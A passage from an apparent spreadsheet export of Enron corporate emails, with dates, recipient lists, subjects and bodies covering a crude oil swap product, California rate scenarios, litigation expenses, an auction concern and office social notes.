To: Matthew Adams/Corp/Enron@ENRON_x000D_
cc: Richard Schneider/Enron Communications@Enron Communications, Tom=20_x000D_
Moran/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Jeff Blumenthal/HOU/ECT@ECT,=20_x000D_
Stephen H Douglas/HOU/ECT@ECT, Bjorn Hagelmann/HOU/ECT@ECT, Rudi=20_x000D_
Zipter/HOU/ECT@ECT, Lisa Lees/HOU/ECT@ECT, Jennifer deBoisblanc=20_x000D_
Denny/HOU/ECT@ECT, Torrey Moorer/HOU/ECT@ECT, Tara Sweitzer/HOU/ECT@ECT, Da=_x000D_
wn=20_x000D_
C Kenne/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Mark Friedman/HOU/ECT@ECT=_x000D_
,=20_x000D_
Melba Lozano/HOU/ECT@ECT=20_x000D_
Subject: New EOL Product - Crude Oil Financial_x000D_
_x000D_
Hi Matt-  =20_x000D_
_x000D_
SIGMA FACTOR REQUEST:_x000D_
Commercial has requested the following new Crude Oil Financial product type=_x000D_
=20_x000D_
on EOL.  The product type is similar to a gas basis link product type excep=_x000D_
t=20_x000D_
that the commodity is Crude.   (Platt's Indices will apply for the fixed an=_x000D_
d=20_x000D_
float pricing) :_x000D_
_x000D_
New Product TypeCommodity: =20_x000D_
Product Type:   US Crude Fin Basis Swap_x000D_
Commodity: Crude Oil_x000D_
Currency:     USD_x000D_
Default UOM:   Barrels_x000D_
Country:   USA_x000D_
_x000D_
Financial Description (e.g):_x000D_
A US Crude financial Swap Transaction with Enron North America Corp., under=_x000D_
=20_x000D_
which either (A) for the case in which Counterparty submits an offer to buy=_x000D_
=20_x000D_
from Enron, Counterparty shall pay the Fixed Price and shall receive the=20_x000D_
Floating Price, each in respect of the Notional Quantity per Determination=_x000D_
=20_x000D_
Period; or (B) for the case in which Counterparty submits an offer to sell =_x000D_
to=20_x000D_
Enron, Counterparty shall receive the Fixed Price and shall pay the Floatin=_x000D_
g=20_x000D_
Price, each in respect of the Notional Quantity per Determination Period.=_x000D_
=20_x000D_
Each calendar month during the term of the Transaction will be a=20_x000D_
Determination Period. The Notional Quantity per Determination Period is the=_x000D_
=20_x000D_
volume submitted by the Counterparty via the website.  The Payment Date(s)=_x000D_
=20_x000D_
will be 5 business days after both the Fixed Price and the Floating Price a=_x000D_
re=20_x000D_
determinable. The Floating Price shall be the average of the Index for each=_x000D_
=20_x000D_
day in the relevant Determination Period._x000D_
_x000D_
The term of the Transaction shall be from the Effective Date to the=20_x000D_
Termination Date. The Effective Date is 01 Jan 2001. The Termination Date i=_x000D_
s=20_x000D_
31 Dec 2001._x000D_
_x000D_
(Note:  The following 3 indices will be applicable)_x000D_
(Light Louisiana Sweet)_x000D_
The Fixed Price for a Determination Period shall be the mean of the daily=_x000D_
=20_x000D_
first line quotations for WTI/(MONTH) under the heading "U.S. $/Bbl" in the=_x000D_
=20_x000D_
Crude Price Assessments section of Platt=01,s Oilgram Price Report for thos=_x000D_
e=20_x000D_
issues published for the applicable Calculation Period, modified by the pri=_x000D_
ce=20_x000D_
submitted by the Counterparty on the website.  The Index for a day shall be=_x000D_
=20_x000D_
the mean of the daily quotations for LLS under the heading "U.S. $/Bbl" in=_x000D_
=20_x000D_
the Crude Price assessments section of Platt=01,s Oilgram Price Report for =_x000D_
those=20_x000D_
issues published for the applicable Calculation Period.=20_x000D_
_x000D_
(West Texas Sour)_x000D_
The Fixed Price for a Determination Period shall be the mean of the daily=_x000D_
=20_x000D_
first line quotations for WTI/(MONTH) under the heading "U.S. $/Bbl" in the=_x000D_
=20_x000D_
Crude Price Assessments section of Platt=01,s Oilgram Price Report for thos=_x000D_
e=20_x000D_
issues published for the applicable Calculation Period, modified by the pri=_x000D_
ce=20_x000D_
submitted by the Counterparty on the website.  The Index for a day shall be=_x000D_
=20_x000D_
the mean of the daily quotations for WTS under the heading "U.S. $/Bbl" in=_x000D_
=20_x000D_
the Crude Price assessments section of Platt=01,s Oilgram Price Report for =_x000D_
those=20_x000D_
issues published for the applicable Calculation Period._x000D_
_x000D_
(Midland Sweet.) =20_x000D_
The Fixed Price for a Determination Period shall be the mean of the daily=_x000D_
=20_x000D_
first line quotations for WTI/(MONTH) under the heading "U.S. $/Bbl" in the=_x000D_
=20_x000D_
Crude Price Assessments section of Platt=01,s Oilgram Price Report for thos=_x000D_
e=20_x000D_
issues published for the applicable Calculation Period, modified by the pri=_x000D_
ce=20_x000D_
submitted by the Counterparty on the website.  The Index for a day shall be=_x000D_
=20_x000D_
the mean of the daily quotations for WTI Midland under the heading "U.S.=20_x000D_
$/Bbl" in the Crude Price assessments section of Platt=01,s Oilgram Price R=_x000D_
eport=20_x000D_
for those issues published for the applicable Calculation Period._x000D_
_x000D_
The price is quoted in US Dollars per unit of volume, which will be the=20_x000D_
Contractual Currency._x000D_
The unit of measure against which the price is quoted shall be Barrels per=_x000D_
=20_x000D_
month and the quantity shown shall be in Barrels per month._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 13:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mpalmer@enron.com', 'susan.mara@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'karen.denne@enron.com', 'michael.tribolet@enron.com', 'skean@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Follow-up with Hertzberg on Core/Noncore</t>
  </si>
  <si>
    <t xml:space="preserve">Hertzberg called.  We very briefly discussed the scenarios that he asked us _x000D_
to build for him.  I've attached the file.  the supporting spreadsheets are _x000D_
not included.  If folks would like them, let me know.  Please keep the file _x000D_
confidential.  _x000D_
_x000D_
Hertzberg wanted to see what happened to rates for large (noncore) customers _x000D_
if the small (core) customers' share of past utility debt is shifted to _x000D_
noncore customers.  _x000D_
Our analsis shows that noncore rates approach Loretta's recent rate increases _x000D_
when approximately 50% of core's share of utility past debt is shifted to _x000D_
businesess (i.e., to noncore).  (In fact, Edison's rate in this scenario is _x000D_
below the Lynch rate, while PG&amp;E's is modestly above.)_x000D_
Increasing the cost shift above the 50% level would start to push rates _x000D_
significantly above the Lynch rates.  _x000D_
Note, however, that in its recent submission to the PUC, DWR's asserts that _x000D_
it's revenue requirement is substantially higher than the revenues support by _x000D_
the Lynch rate increase, suggesting that Lynch will have to increase rates _x000D_
again soon. _x000D_
In addition, Loretta's rates also do not reflect past utility costs, which _x000D_
will require yet additional increases._x000D_
I expect to have another conversation with the Speaker later this evening or _x000D_
tomorrow to discuss the scenarios in more detail  (he would still like to put _x000D_
100% of the IOUs past debts on noncore in exchange for getting a competitive _x000D_
market and out from under Loretta)._x000D_
I will report back after we've spoken._x000D_
All ideas, suggestions, etc. regarding the attached spreadsheet are welcome _x000D_
and appreciated._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 02:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>HPL Noms. for Jan. 20-22, 2001</t>
  </si>
  <si>
    <t>(See attached file: HPLN0120.xls)_x000D_
_x000D_
 - HPLN0120.xls</t>
  </si>
  <si>
    <t>Wed, 23 Feb 2000 03:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: NSM Expenses</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Richard B Sanders/HOU/ECT on 02/23/2000 _x000D_
11:29 AM ---------------------------_x000D_
_x000D_
_x000D_
Christopher B Hunt@ENRON_DEVELOPMENT_x000D_
02/18/2000 04:32 PM_x000D_
To: Richard B Sanders@ECT_x000D_
cc:  _x000D_
Subject: Re: NSM Expenses_x000D_
_x000D_
Richard -_x000D_
_x000D_
I understand we'll be meeting next week.  I figured one of the first things _x000D_
you'd be asking me for is an accounting on what Enron spent on the power _x000D_
plant, so I thought I'd pre-empt you and send it in advance. _x000D_
_x000D_
Chris_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Christopher B Hunt/ENRON_DEVELOPMENT on _x000D_
02/17/2000 01:30 PM ---------------------------_x000D_
_x000D_
_x000D_
Frank Lobdell_x000D_
02/16/2000 11:11 AM_x000D_
To: Christopher B Hunt/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: NSM Expenses  _x000D_
_x000D_
Chris,_x000D_
_x000D_
The attached schedule details the $1.3 million of costs incurred on the NSM _x000D_
Power Plant Project.  Note that until December 1999 these costs were deferred _x000D_
costs on our balance sheet.  In December, however, we wrote these costs off._x000D_
_x000D_
Thanks,_x000D_
Frank_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Christopher B Hunt_x000D_
02/16/2000 06:37 AM_x000D_
To: Frank  Lobdell_x000D_
cc:  _x000D_
_x000D_
Subject: NSM Expenses_x000D_
_x000D_
PRIVILEGED AND CONFIDENTIAL _x000D_
_x000D_
Frank -_x000D_
_x000D_
Would it be possible to get a printout of all the expenses incurred on the _x000D_
NSM Power Plant AFE?  An itemized list and total would be perfect if that is _x000D_
possible.  I need the list because ECT is being sued over their involvement _x000D_
and one allegation would be helped if we can prove that we were very _x000D_
committed to making the project work (e.g., through spending a lot of time _x000D_
and money on the power plant)._x000D_
_x000D_
I'll need this by Tuesday afternoon if possible to give to the ECT _x000D_
attorneys.  Sending it by e-mail would be best so I can add a note and _x000D_
forward it on._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Chris_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 00:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kirk.lenart@enron.com', 'jessica.white@enron.com', 'tricia.spence@enron.com', 'carlos.rodriguez@enron.com', 'daren.farmer@enron.com', 'scott.loving@enron.com', 'aimee.lannou@enron.com', 'darren.espey@enron.com', 'clarissa.garcia@enron.com', 'teresa.mcomber@enron.com', 'meredith.homco@enron.com', 'jesse.villarreal@enron.com', 'mary.ellenberger@enron.com', 'sabra.dinari@enron.com', 'cynthia.franklin@enron.com', 'christina.sanchez@enron.com', 'george.smith@enron.com', 'mark.schrab@enron.com', 'margie.straight@enron.com', 'patti.sullivan@enron.com', 'hpl.scheduling@enron.com'})</t>
  </si>
  <si>
    <t>Attached is the availability spreadsheet for February, 2001. 	If I_x000D_
 can be of any assistance, please</t>
  </si>
  <si>
    <t xml:space="preserve">This is the first of 2 e-mails received by Devon.  The second will _x000D_
immediately follow._x000D_
_x000D_
Beverly_x000D_
_x000D_
---------------------- Forwarded by Beverly Beaty/HOU/ECT on 01/24/2001 07:23 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Victor Haley" &lt;Victor.Haley@dvn.com&gt;                           _x000D_
01/22/2001 01:41 PM_x000D_
	_x000D_
_x000D_
To: &lt;beverly.beaty@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Attached is the availability spreadsheet for February, 2001.  If I _x000D_
can be of any assistance, please_x000D_
_x000D_
_x000D_
Attached is the availability spreadsheet for February, 2001.  If I can be of _x000D_
any assistance, please call me at 405.228.4298._x000D_
_x000D_
 - EnronAvails0201.xls_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Mar 2000 08:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jewel.meeks@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'anabel.gutierrez@enron.com', 'sara.ledbetter@enron.com', 'jeff.skilling@enron.com', 'jane.weaver@enron.com', 'dan@travelpark.com', 'charlotte.banks@enron.com', 'fran.mayes@enron.com', 'deborah.edison@enron.com', 'suzanne.danz@enron.com', 'dorie.hitchcock@enron.com', 'sandra.mcnichols@enron.com', 'tammy.drew@enron.com', 'sarita.garza@enron.com', 'rex.shelby@enron.com', 'dolores.fisher@enron.com', 'cindy.adams@enron.com', 'kevin.hannon@enron.com', 'stella.ely@enron.com', 'michelle.hargrave@enron.com', 'karen.heathman@enron.com', 'pat.jefferson@enron.com', 'mary.moore@enron.com', 'scott.yeager@enron.com', 'richard.dimichele@enron.com', 'kenneth.rice@enron.com', 'xochil.moreno@enron.com', 'linda.noske@enron.com', 'stephanie.cole@enron.com', 'karla.feldman@enron.com', 'tom.gros@enron.com', 'rita.flores@enron.com', 'bridget.maronge@enron.com', 'digna.showers@enron.com', 'steve.lovett@enron.com', 'jane.wilson@enron.com', 'larie.harsell@enron.com', 'shelly.mansfield@enron.com', 'charles.reyes@enron.com', 'geraldine.irvine@enron.com', 'angelina.lorio@enron.com', 'sally.slaughter@enron.com', 'liz.taylor@enron.com', 'wilma.williams@enron.com', 'christopher.walton@enron.com', 'mike.mcconnell@enron.com', 'gracie.presas@enron.com', 'kimberly.bullock@enron.com', 'kristy.carnes@enron.com', 'gabriel.fuzat@enron.com', 'lorie.belsha@enron.com', 'drew.lynch@enron.com', 'barbara.johnson@enron.com', 'kristina.mordaunt@enron.com', 'mike.harrelson@enron.com', 'melissa.jones@enron.com', 'roberta.birhiray@enron.com', 'gloria.alvarez@enron.com', 'deb.gebhardt@enron.com', 'lucy.marshall@enron.com', 'kimberlee.bennick@enron.com', 'andrew.fastow@enron.com', 'vanessa.bob@enron.com', 'bert.frazier@enron.com', 'elisa.tamez@enron.com', 'sandy.lewelling@enron.com', 'melinda.mccarty@enron.com', 'debbie.contreras@enron.com', 'lynn.tippery@enron.com', 'becky.tlucek@enron.com', 'airam.arteaga@enron.com', 'roger.estrada@enron.com', 'anna.harris@enron.com', 'gretchen.jennings@enron.com', 'gail.hargrave@enron.com', 'andrea.yowman@enron.com', 'lorraine.simmons@enron.com', 'felicia.doan@enron.com', 'amy.lee@enron.com', 'richard.weeks@enron.com', 'pam.benson@enron.com', 'jeff.donahue@enron.com', 'donna.baker@enron.com', 'rosario.carbone@enron.com', 'christine.drummond@enron.com', 'irena.hogan@enron.com', 'kevin.howard@enron.com', 'lorraine.becker@enron.com', 'melinda.tosoni@enron.com', 'sylvia.sauseda@enron.com', 'jennifer.burns@enron.com', 'david.oxley@enron.com', 'xochitl-alexis.rodriguez@enron.com', 'nicki.daw@enron.com', 'stinson.gibner@enron.com', 'ann.joyner@enron.com', 'sandy.hoelscher@enron.com', 'sherri.saunders@enron.com', 'david.cox@enron.com', 'stephanie.strong@enron.com', 'marge.nadasky@enron.com', 'cherylene.westbrook@enron.com', 'mercedes.estrada@enron.com', 'ronald.slimp@enron.com', 'kay.chapman@enron.com', 'brad.alford@enron.com', 'theresa.smith@enron.com', 'susan.lopez@enron.com', 'karen.owens@enron.com', 'wanda.curry@enron.com', 'cindy.shaffer@enron.com', 'larry.lawyer@enron.com', 'renee.ingram@enron.com', 'sandy.stone@enron.com', 'kimberly.perkins@enron.com', 'carol.brown@enron.com', 'martha.reyna@enron.com', 'jenny.rub@enron.com', 'susan.wadle@enron.com', 'brenda.flores-cuellar@enron.com', 'paula.corey@enron.com', 'mark.lindsey@enron.com', 'tim.dalton@enron.com', 'judy.timson@enron.com', 'carmella.jones@enron.com', 'joan.richard@enron.com', 'tracy.adams@enron.com', 'terrie.wheeler@enron.com', 'adriana.celedon@enron.com', 'colette.stork@enron.com', 'dana.davis@enron.com', 'brad.nebergall@enron.com', 'lerea.pharr@enron.com', 'james.row@enron.com', 'maria.julian@enron.com', 'kal.abdalla@enron.com', 'cathy.phillips@enron.com', 'erica.leydic@enron.com', 'felicia.solis@enron.com', 'anthony.mends@enron.com', 'richard.causey@enron.com', 'jane@travelpark.com', 'joanne.garner@enron.com', 'stephanie.harris@enron.com', 'grace.warren@enron.com', 'nancy.young@enron.com', 'crissy.collett@enron.com', 'steve.elliott@enron.com', 'jean.mrha@enron.com', 'brent.price@enron.com', 'marcia.broom@enron.com', 'gregg.simmons@enron.com', 'jessica.davila@enron.com', 'sarah.lewis@enron.com', 'lola.weller@enron.com', 'marye@travelpark.com', 'terri.bachand@enron.com', 'julie.flahaven@enron.com', 'jim.rowh@enron.com', 'darlene.forsyth@enron.com', 'nicki@travelpark.com', 'erika.edwards@enron.com', 'candi.woods@enron.com', 'maureen@travelpark.com', 'vince.kaminski@enron.com', 'james.sumpter@enron.com', 'dolores.sustaita@enron.com', 'stacey.duplessis@enron.com', 'sue.nix@enron.com', 'terrie.james@enron.com', 'philippe.bibi@enron.com', 'rebekah.rushing@enron.com', 'maureen.mcvicker@enron.com', 'karen.myer@enron.com', 'marla.barnard@enron.com', 'ruth.brown@enron.com', 'vanessa.groscrand@enron.com', 'maryann.long@enron.com', 'rhonna.palmer@enron.com', 'laura.pena@enron.com', 'susan.kalich@enron.com', 'eddie.sera@enron.com', 'paul.trieschman@enron.com', 'ceci.twachtman@enron.com', 'fannette.perry@enron.com', 'carmen.chavira@enron.com', 'sharron.westbrook@enron.com', 'david.berberian@enron.com', 'patty.pennington@enron.com', 'robin.jordan@enron.com', 'marie.thibaut@enron.com', 'pamela.allison@enron.com', 'cliff.baxter@enron.com', 'sharon.purswell@enron.com', 'valeria.hope@enron.com', 'kim.zachary@enron.com', 'rabis.nickson@enron.com', 'cecilia.olvera@enron.com', 'julie.armstrong@enron.com', 'tori.wells@enron.com', 'susan.skarness@enron.com', 'mark.russ@enron.com', 'susan.tosoni@enron.com', 'nicole.hunter@enron.com', 'francisca.juarez@enron.com', 'esther.buckley@enron.com', 'jeffrey.mcmahon@enron.com', 'rosalee.fleming@enron.com', 'loretta.brooks@enron.com', 'rosalinda.resendez@enron.com', 'amy.palmisano@enron.com', 'sherri.reinartz@enron.com', 'jeanie.slone@enron.com', 'lou.casari@enron.com', 'joe.hirko@enron.com', 'tina.rode@enron.com', 'sue.ford@enron.com', 'joannie.williamson@enron.com', 'jana.giovannini@enron.com', 'marla.mallett-davis@enron.com', 'jennifer.adams@enron.com', 'helen.taylor@enron.com', 'elisabeth.mends@enron.com', 'amanda.martin@enron.com', 'eric.stewart@enron.com', 'everett.plante@enron.com', 'kevin.garland@enron.com', 'peggy.mccurley@enron.com', 'mechelle.stevens@enron.com', 'laura.valencia@enron.com', 'mary.civik@enron.com', 'sheri.cromwell@enron.com', 'cindy.olson@enron.com', 'sharon@travelpark.com', 'lesliem@travelpark.com', 'sarah.goodpastor@enron.com', 'john.brindle@enron.com', 'tod.lindholm@enron.com', 'katherine.brown@enron.com', 'cindy.stark@enron.com'})</t>
  </si>
  <si>
    <t>Great news everyone......._x000D_
_x000D_
Dorothy and Tim are the proud parents of a 9 lb 9 1/2 oz and 21 1/2 inches _x000D_
long baby boy born @ 3:15 pm today.  Mother and baby are both doing fine.  He _x000D_
has lots of brown hair with red tints.  They have not named him yet, but I _x000D_
will forward that information as soon as I get it._x000D_
Hospital information:_x000D_
 _x000D_
  Houston Northwest Medical Center_x000D_
  Women's Atrium_x000D_
  710 FM 1960_x000D_
  Houston, TX  77090_x000D_
_x000D_
  (281) 587-3296_x000D_
_x000D_
_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Mon, 4 Oct 1999 13:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mike.harris@enron.com'})</t>
  </si>
  <si>
    <t>Re: hydro auction</t>
  </si>
  <si>
    <t xml:space="preserve">The question is legitimate.  With the potential for exchanges among _x000D_
affiliates being very real, the only possible solution is to either prohibit _x000D_
affiliate participation or make iron-clad the confidentiality/non-disclosure _x000D_
agreement.  Of course, once you allow the affiliate to participate, being _x000D_
able to determine if an "inappropriate" transfer of information has occurred _x000D_
is almost impossible.  The other problem is that Enron has been an advocate _x000D_
of affiliate participation in the sale of assets, as long as the relationship _x000D_
was arms-length and no preferential treatment was provided.  As proposed, _x000D_
PG&amp;E states that its affiliate will be treated the same as other bidders.  _x000D_
So, I think that leaves us with buttressing the proposed confidentiality _x000D_
language to prevent such exchanges as much as possible._x000D_
_x000D_
We would also have to assume, for the information to be beneficial to PG&amp;E's _x000D_
affiliate, that it would result in PG&amp;E Gen obtaining the assets.  As _x000D_
proposed by PG&amp;E, they would have to be the highest bidder, taking into _x000D_
consideration certain tax benefits associated with the sale to an affiliate _x000D_
(PG&amp;E's proposal, not my assessment).  In other words, PG&amp;E claims that the _x000D_
ultimate determination of the winning bidder is price.  If the result was _x000D_
that PG&amp;E Gen paid more for these assets than anyone else, it becomes a _x000D_
little more difficult to claim that the auction was unfair.  _x000D_
_x000D_
However, I believe that the ultimate determination is price, with a caveat.  _x000D_
The caveat is acceptance by PG&amp;E of amendments to the attached service _x000D_
agreements.  PG&amp;E allows for bidders to submit amendments to the service _x000D_
agreements, but PG&amp;E retains the right to reject the amendments if not _x000D_
acceptable to them.  PG&amp;E Gen may know what amendments are and are not _x000D_
acceptable.  That may be the inside track for the affiliate.  But again, I _x000D_
think it brings us back to ensuring equitable treatment as much as possible _x000D_
in the auction protocol rather than preventing PG&amp;E Gen from participating._x000D_
_x000D_
If you feel this is not adequate, please let me know._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Mike Harris                           10/04/99 04:42 PM_x000D_
	Phone No: 713 853-6091_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: Mona L Petrochko/SFO/EES@EES_x000D_
cc: Dennis Benevides, Greg Cordell/HOU/EES@EES _x000D_
Subject: hydro auction_x000D_
_x000D_
Mona,_x000D_
Jeff pointed me to you.  Below are some concerns I have on the PG&amp;E hydro _x000D_
auction.  What are your thoughts on the opportunity for PG&amp;E Gen to adversely _x000D_
affect the auction outcome through access to non-public information?  Also, _x000D_
how strong are the mitigants against this behavior?_x000D_
_x000D_
Mike_x000D_
---------------------- Forwarded by Mike Harris/HOU/EES on 10/04/99 06:40 PM _x000D_
---------------------------_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Mike Harris                           10/04/99 06:32 PM_x000D_
	Phone No: 713 853-6091_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: Jeff Dasovich/SFO/EES@EES_x000D_
cc:  _x000D_
Subject: hydro auction_x000D_
_x000D_
Jeff,_x000D_
Who is handling the PG&amp;E hydro auction?  _x000D_
_x000D_
I have a concern about PG&amp;E Generation's participation in this auction.  _x000D_
Every press release from PG&amp;E on this topic goes out of its way to state that _x000D_
PG&amp;E Gen will be a bidder.  My concern is their access to non-public _x000D_
information and how this may skew the results of the auction.  If you're the _x000D_
person on this, let's talk.  If not, pls let me know who is.  Hope you're _x000D_
doing well._x000D_
_x000D_
Mike_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 06:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Fall Season begins Oct. 2nd!!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 09/21/2000 _x000D_
01:01 PM ---------------------------_x000D_
_x000D_
_x000D_
"Marcantel MM (Mitch)" &lt;MMMarcantel@equiva.com&gt; on 09/21/2000 11:54:27 AM_x000D_
To: "'Matthew.Lenhart@enron.com'" &lt;Matthew.Lenhart@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Fall Season begins Oct. 2nd!!_x000D_
_x000D_
_x000D_
_x000D_
Here's an update on the Fall league. Once you have a list of people_x000D_
(hotties) who want to play, sent it to me and I'll make sure our team is_x000D_
stacked._x000D_
_x000D_
Pass this on the Brian Hull._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Roy_Dealy@veritasdgc.com [mailto:Roy_Dealy@veritasdgc.com]_x000D_
Sent: Thursday, September 21, 2000 11:30 AM_x000D_
To: Andrea.Girouard@westgroup.com; AC199728@MSXSOC.shell.com;_x000D_
bethany.crotty@ac.com; brettw@westernwaterproofing.com;_x000D_
cyndiechon@yahoo.com; cyndie.chon@officeteam.com;_x000D_
dtostado@microstrategy.com; davidswords@altavista.com;_x000D_
spencer_doug@yahoo.com; EZachar@rens.com; HLCoursey@equiva.com;_x000D_
hugh.kilpatrick@kvaerner.com; Jarield.Francis@HALLIBURTON.com;_x000D_
jjacoby@rens.com; Jenb_2830@yahoo.com; Jennifer_Luke@eogresources.com;_x000D_
JPardue@lgc.com; Joeytforrest@aol.com; jplafontaine@stoprust.com;_x000D_
jreich@rens.com; kseschete@hotmail.com; Kim_Walsh@veritasdgc.com;_x000D_
KBreau@coair.com; kyle_etter@hotmail.com; marc.kuck@bakeroiltools.com;_x000D_
marckuck@ev1.net; Mary_Schroder@bmc.com; dmgue@aol.com;_x000D_
mralvarez@shellus.com; MMMarcantel@equiva.com; Moniquem94@aol.com;_x000D_
j_mo_tx@hotmail.com; natalie.a.giuffre@rssmb.com;_x000D_
Nicola_Quin@veritasdgc.com; presche@ppco.com; frommera@ucarb.com;_x000D_
rob.puckett@weatherford.com; baker_scot@hotmail.com;_x000D_
scottflow@worldnet.att.net; sbennett@neosoft.com;_x000D_
RICHESJ@MSXSOPC.shell.com; thad.scott@weatherford.com;_x000D_
casares@astros.com; ZONCALE@equiva.com_x000D_
Subject: Fall Season begins Oct. 2nd!!_x000D_
_x000D_
_x000D_
I hope everyone enjoyed themselves this past season!!_x000D_
As for me, despite the mood I was in during our loss Tuesday, I did_x000D_
actually have fun!  Sorry for being such a d---head!!_x000D_
_x000D_
Anyway, on to more positive stuff.... I have decided to put myself through_x000D_
this one more time (no Winter league for me!), but I need your help._x000D_
Please let me know the following..._x000D_
_x000D_
     - if you are interested in playing full-time in the Tuesday night Fall_x000D_
coed league that will begin Oct. 3rd_x000D_
or_x000D_
     - if you are only interested in being a sub_x000D_
_x000D_
Remember, the cost of the team is fixed and each person's share is_x000D_
determined by the number of people paying, so please only commit if you_x000D_
will be coming out to play (and pay)._x000D_
_x000D_
Please reply by next WEDNESDAY, SEPTEMBER 27th.  I will not assume that you_x000D_
want to play unless you send me a confirmation email._x000D_
_x000D_
Thanks,_x000D_
Roy_x000D_
</t>
  </si>
  <si>
    <t>Sun, 6 Jan 2002 00:36:56 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/6/02; HourAhead hour: 3;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 1/6/02; HourAhead hour: 3;  No ancillary schedules awarded.  Variances detected._x000D_
Variances detected in Load schedule. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010603.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 3 / Preferred: 111.74 / Final: 111.71)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SDG1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 1/6/02_x000D_
  SC_ID: ENRJ_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 09:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: No sleeping on the job...</t>
  </si>
  <si>
    <t xml:space="preserve">Sounds good to me...Coincidentally, a made service will be coming to clean my _x000D_
car this evening _x000D_
_x000D_
Susan _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ted Noble_x000D_
07/18/2000 03:21 PM_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: No sleeping on the job...  _x000D_
_x000D_
Let's plan on heading over there around 8:00-8:30 so there is absolutely no _x000D_
hurrying after work.  Steak night is a time of leisure so take all the time _x000D_
you need to get home, change and relax before heading out.  I live at the _x000D_
Park at River Oaks (West Alabama &amp; Buffalo Speedway on Buffalo Speedway--from _x000D_
your place just take a right on Buffalo Speedway and its the first place on _x000D_
your left) and the only entrance has a guard and he will call up to my place _x000D_
to let you in.  Park at any labelled guest spot (left side of the up ramps 4 _x000D_
floors) and my place is #3309 - closest building to the corner of Buffalo _x000D_
Speedway and West Alabama.  Now I am really tired from all this typing._x000D_
_x000D_
Ted_x000D_
_x000D_
By the way, a maid service is coming to clean my place tomorrow afternoon.  _x000D_
Quite a coincidence ... hmmm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
07/18/2000 02:40 PM_x000D_
To: Ted Noble/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: No sleeping on the job...  _x000D_
_x000D_
Hey Math-Wiz,_x000D_
_x000D_
I completely understand your plight.  I too am suffering a two o'clock, _x000D_
post-lunch slump (the coffee is simply not working at this point).  Anyway, I _x000D_
think a change of clothes prior to Steak Night is probably a good idea.  _x000D_
Also, driving tomorrow is not a problem... just let me know the gate code, _x000D_
apt. #, etc.  Along those same lines, what time did you want to head over _x000D_
there?  (For better-safe-than-sorry reasons, due to my job, I think no _x000D_
earlier than 7:30 p.m. is our best bet.)_x000D_
_x000D_
Hope you're having a lovely day and don't work too hard (Ha!!)._x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ted Noble_x000D_
07/18/2000 02:05 PM_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Every day needs a little dose of levity...  _x000D_
_x000D_
Hey Shorty,_x000D_
_x000D_
I hope your day is going well.  We took our MD out for lunch because he is _x000D_
relocating to NY and will spend about a week in Houston a month.  Well, to _x000D_
make a short story long, we ate at Erma's (great food) but I am getting very _x000D_
sleepy (life is difficult I know) from eating way too much.  I assume we are _x000D_
going home to change into some casual/hot weather clothes before dinner _x000D_
tomorrow and I may need you to pick me up.  I am still looking for some good _x000D_
jokes that I can send to you that are funny but still moderately appropriate _x000D_
